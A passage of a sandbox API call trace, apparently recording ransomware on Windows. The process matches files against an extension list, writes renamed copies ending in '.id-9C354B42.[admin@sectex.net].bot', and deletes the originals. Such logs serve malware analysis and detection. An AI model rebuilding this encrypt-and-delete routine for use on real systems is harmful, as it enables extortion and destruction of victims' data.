	[0151.015] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2db0, lpOverlapped=0x0) returned 1
	[0151.016] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.016] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.016] SetEndOfFile (hFile=0x38c) returned 1
	[0151.016] CloseHandle (hObject=0x38c) returned 1
	[0151.017] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.017] SetEndOfFile (hFile=0x3b0) returned 1
	[0151.019] CloseHandle (hObject=0x3b0) returned 1
	[0151.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg")) returned 1
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString=".doc") returned 4
	[0151.020] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.020] lstrlenW (lpString=".docx") returned 5
	[0151.020] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0151.020] lstrlenW (lpString=".pdf") returned 4
	[0151.020] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.020] lstrlenW (lpString=".xls") returned 4
	[0151.020] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.020] lstrlenW (lpString=".xlsx") returned 5
	[0151.020] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0151.020] lstrlenW (lpString=".ppt") returned 4
	[0151.020] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString=".zip") returned 4
	[0151.020] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.020] lstrlenW (lpString=".rar") returned 4
	[0151.020] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.020] lstrlenW (lpString=".bz2") returned 4
	[0151.020] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.020] lstrlenW (lpString=".7z") returned 3
	[0151.020] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString=".dbf") returned 4
	[0151.020] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString=".1cd") returned 4
	[0151.020] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.020] lstrlenW (lpString=".jpg") returned 4
	[0151.020] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString=".doc") returned 4
	[0151.021] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.021] lstrlenW (lpString=".docx") returned 5
	[0151.021] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0151.021] lstrlenW (lpString=".pdf") returned 4
	[0151.021] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.021] lstrlenW (lpString=".xls") returned 4
	[0151.021] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.021] lstrlenW (lpString=".xlsx") returned 5
	[0151.021] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0151.021] lstrlenW (lpString=".ppt") returned 4
	[0151.021] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString=".zip") returned 4
	[0151.021] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.021] lstrlenW (lpString=".rar") returned 4
	[0151.021] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.021] lstrlenW (lpString=".bz2") returned 4
	[0151.021] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.021] lstrlenW (lpString=".7z") returned 3
	[0151.021] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString=".dbf") returned 4
	[0151.021] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString=".1cd") returned 4
	[0151.021] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 63
	[0151.021] lstrlenW (lpString=".jpg") returned 4
	[0151.022] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.022] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0151.022] lstrlenW (lpString="J0099153.WMF") returned 12
	[0151.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.023] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=13874) returned 1
	[0151.023] CloseHandle (hObject=0x3b0) returned 1
	[0151.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf")) returned 0x20
	[0151.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.023] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.023] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0151.024] GetLastError () returned 0x0
	[0151.024] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3632, lpOverlapped=0x0) returned 1
	[0151.026] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3640, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3640, lpOverlapped=0x0) returned 1
	[0151.027] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.027] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.027] SetEndOfFile (hFile=0x38c) returned 1
	[0151.027] CloseHandle (hObject=0x38c) returned 1
	[0151.027] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.027] SetEndOfFile (hFile=0x3b0) returned 1
	[0151.030] CloseHandle (hObject=0x3b0) returned 1
	[0151.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf")) returned 1
	[0151.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.031] lstrlenW (lpString=".doc") returned 4
	[0151.031] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.031] lstrlenW (lpString=".docx") returned 5
	[0151.031] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0151.031] lstrlenW (lpString=".pdf") returned 4
	[0151.031] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.031] lstrlenW (lpString=".xls") returned 4
	[0151.031] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.031] lstrlenW (lpString=".xlsx") returned 5
	[0151.031] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0151.032] lstrlenW (lpString=".ppt") returned 4
	[0151.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString=".zip") returned 4
	[0151.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.032] lstrlenW (lpString=".rar") returned 4
	[0151.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString=".bz2") returned 4
	[0151.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString=".7z") returned 3
	[0151.032] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString=".dbf") returned 4
	[0151.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString=".1cd") returned 4
	[0151.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString=".jpg") returned 4
	[0151.032] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.032] lstrlenW (lpString=".doc") returned 4
	[0151.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString=".docx") returned 5
	[0151.032] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0151.032] lstrlenW (lpString=".pdf") returned 4
	[0151.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.032] lstrlenW (lpString=".xls") returned 4
	[0151.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.032] lstrlenW (lpString=".xlsx") returned 5
	[0151.032] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0151.033] lstrlenW (lpString=".ppt") returned 4
	[0151.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.033] lstrlenW (lpString=".zip") returned 4
	[0151.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.033] lstrlenW (lpString=".rar") returned 4
	[0151.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.033] lstrlenW (lpString=".bz2") returned 4
	[0151.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.033] lstrlenW (lpString=".7z") returned 3
	[0151.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.033] lstrlenW (lpString=".dbf") returned 4
	[0151.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.033] lstrlenW (lpString=".1cd") returned 4
	[0151.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 63
	[0151.033] lstrlenW (lpString=".jpg") returned 4
	[0151.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.033] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.033] lstrlenW (lpString="J0099154.JPG") returned 12
	[0151.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.034] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=6929) returned 1
	[0151.034] CloseHandle (hObject=0x3b0) returned 1
	[0151.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg")) returned 0x20
	[0151.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.035] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.035] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0151.036] GetLastError () returned 0x0
	[0151.036] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1b11, lpOverlapped=0x0) returned 1
	[0151.037] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1b20, lpOverlapped=0x0) returned 1
	[0151.038] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.038] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.039] SetEndOfFile (hFile=0x38c) returned 1
	[0151.039] CloseHandle (hObject=0x38c) returned 1
	[0151.039] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.039] SetEndOfFile (hFile=0x3b0) returned 1
	[0151.041] CloseHandle (hObject=0x3b0) returned 1
	[0151.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg")) returned 1
	[0151.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.042] lstrlenW (lpString=".doc") returned 4
	[0151.042] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.042] lstrlenW (lpString=".docx") returned 5
	[0151.042] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1
	[0151.042] lstrlenW (lpString=".pdf") returned 4
	[0151.042] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.042] lstrlenW (lpString=".xls") returned 4
	[0151.042] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.042] lstrlenW (lpString=".xlsx") returned 5
	[0151.042] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1
	[0151.042] lstrlenW (lpString=".ppt") returned 4
	[0151.042] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.042] lstrlenW (lpString=".zip") returned 4
	[0151.042] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.042] lstrlenW (lpString=".rar") returned 4
	[0151.042] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.042] lstrlenW (lpString=".bz2") returned 4
	[0151.042] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.042] lstrlenW (lpString=".7z") returned 3
	[0151.042] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.042] lstrlenW (lpString=".dbf") returned 4
	[0151.042] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.042] lstrlenW (lpString=".1cd") returned 4
	[0151.043] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString=".jpg") returned 4
	[0151.043] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString=".doc") returned 4
	[0151.043] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.043] lstrlenW (lpString=".docx") returned 5
	[0151.043] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1
	[0151.043] lstrlenW (lpString=".pdf") returned 4
	[0151.043] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.043] lstrlenW (lpString=".xls") returned 4
	[0151.043] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.043] lstrlenW (lpString=".xlsx") returned 5
	[0151.043] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1
	[0151.043] lstrlenW (lpString=".ppt") returned 4
	[0151.043] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString=".zip") returned 4
	[0151.043] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.043] lstrlenW (lpString=".rar") returned 4
	[0151.043] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.043] lstrlenW (lpString=".bz2") returned 4
	[0151.043] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.043] lstrlenW (lpString=".7z") returned 3
	[0151.043] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString=".dbf") returned 4
	[0151.043] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.043] lstrlenW (lpString=".1cd") returned 4
	[0151.044] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 63
	[0151.044] lstrlenW (lpString=".jpg") returned 4
	[0151.044] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.044] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.044] lstrlenW (lpString="J0099155.JPG") returned 12
	[0151.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.044] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8826) returned 1
	[0151.044] CloseHandle (hObject=0x3b0) returned 1
	[0151.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg")) returned 0x20
	[0151.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0151.045] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.045] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0151.046] GetLastError () returned 0x0
	[0151.046] ReadFile (in: hFile=0x3b0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x227a, lpOverlapped=0x0) returned 1
	[0151.942] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2280, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2280, lpOverlapped=0x0) returned 1
